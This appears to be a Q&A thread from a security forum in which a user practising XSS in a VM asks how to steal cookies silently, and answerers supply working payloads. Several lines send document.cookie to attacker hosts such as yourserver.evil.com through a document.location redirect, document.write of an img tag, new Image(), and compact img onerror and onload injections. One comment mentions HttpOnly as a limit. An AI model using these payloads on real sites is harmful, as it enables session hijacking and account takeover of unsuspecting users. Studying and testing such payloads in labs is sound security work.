I'm practicing in VM following the OWASP guide. I know that is possible to steal the cookie by redirecting to "False" page etc. but I would like to steal the cookie without redirecting on another page.
So, if you have some guestbook and then you put:
document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
How can I put this into existing page without redirecting?
Basically, what I want is when someone clicks on the link, grab the cookie and print it somewhere on the current page. Maybe in some
alt
tag or whatever.
Any ideas?
- Google changed the way cookies are written. I can't get session cookies using the above method. – user63648 Dec 16 '14 at 20:40
add a comment
2 Answers
If you have full control of the JavaScript getting written to the page then you could just do
document.write('cookie: ' + document.cookie)
If you want it sent to another server, you could include it in a non-existent image:
document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')
The key here being whether you can output arbitrary JavaScript or whether you're limited in the kind of JavaScript you can get executed. Though if you're limited in what can be output you could use more advanced methods of getting your custom code to execute which are a bit out of scope of the question.
- 6And you can even request it without writing to
document
:image = new Image(); image.src='http://example.com?c='+document.cookie;
– НЛО May 23 '14 at 9:24 - I cannot edit your post but there is a missing quote,
/>)
should be/>')
. Thanks anyway excellent answer – Alain Tiemblo Feb 25 '15 at 15:46 - This should not the case if the cookie is marked with the HttpOnly attribute. – Joaquin Brandan Mar 25 at 17:43
To add onto Steve's answer, there are many different ways to achieve this. If your intention is to not have the user be aware of the stolen cookie, I would suggest the
<img>
attack Steve suggested. Although I prefer avoiding the document.write since it uses up so many characters:<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
- This is nice and compact, but the problem is that it will recursively trigger the
onerror
handler unless an image is served from the attacker's page. – multithr3at3d Jun 4 at 20:47 - I uses this approach but as the source you can use an existing image and use the
onload
attribute for the payload:<img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://yourserver/?'+document.cookie>
– coffeemakr Dec 15 at 16:00